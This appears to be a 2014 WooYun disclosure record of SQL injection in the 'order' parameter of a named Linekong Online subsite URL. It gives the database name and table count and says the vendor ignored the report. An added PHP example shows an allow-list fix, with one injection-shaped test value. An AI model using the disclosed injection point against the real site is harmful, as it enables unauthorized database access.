WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
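2014-12-16: Details reported to the vendor; awaiting vendor handling
2014-12-21: The vendor has chosen to ignore the vulnerability; details disclosed to the public
SQL injection on a Linekong Online (蓝港在线) subsite
Injection point: http://yt.linekong.com/morei.php?types=all&order=add_time (the order parameter)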
Database: yt_web [85 tables]
This is something you are better at.
Severity: No impact (ignored by vendor)
Ignored at: 2014-12-21 16:42
None yet
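The report locates the flaw in the `order` parameter, which ends up in an ORDER BY clause where prepared-statement placeholders cannot be used for identifiers. The following is an added example, not code from the site or the original report, showing an allow-list for the sort column with the filter value bound as a parameter; the `items` table, the `title`, `hits` and `type` columns and the `dir` parameter are assumptions.

```php
<?php
// Added example, not the site's code. Only `types`, `order` and `add_time`
// come from the reported URL; every other name is hypothetical.

// Accepted `order` values mapped to the SQL identifier they become.
// Identifiers cannot be bound, so input outside this map is never used.
const ORDER_COLUMNS = [
    'add_time' => 'add_time',
    'title'    => 'title',   // hypothetical column
    'hits'     => 'hits',    // hypothetical column
];

function build_listing_query(array $get): array
{
    $order = $get['order'] ?? 'add_time';
    if (!is_string($order) || !array_key_exists($order, ORDER_COLUMNS)) {
        $order = 'add_time';             // fall back, never echo the input
    }
    // Sort direction (hypothetical `dir` parameter): two fixed literals only.
    $dir = (isset($get['dir']) && is_string($get['dir'])
        && strtolower($get['dir']) === 'asc') ? 'ASC' : 'DESC';

    $sql    = 'SELECT id, title, add_time FROM items'; // hypothetical table
    $params = [];
    $types  = $get['types'] ?? 'all';
    if (is_string($types) && $types !== 'all') {
        $sql .= ' WHERE type = :type';   // value is bound, not concatenated
        $params[':type'] = $types;
    }
    $sql .= ' ORDER BY ' . ORDER_COLUMNS[$order] . ' ' . $dir;
    return [$sql, $params];              // pass to PDO::prepare()/execute()
}

// Constructed requests: one shaped like the reported URL, one whose `order`
// value is not on the allow-list and is therefore replaced by the default.
$samples = [
    ['types' => 'all',  'order' => 'add_time'],
    ['types' => 'news', 'order' => 'add_time DESC, 1'],
];
foreach ($samples as $get) {
    [$sql, $params] = build_listing_query($get);
    echo $sql, ' ', json_encode($params), PHP_EOL;
}
```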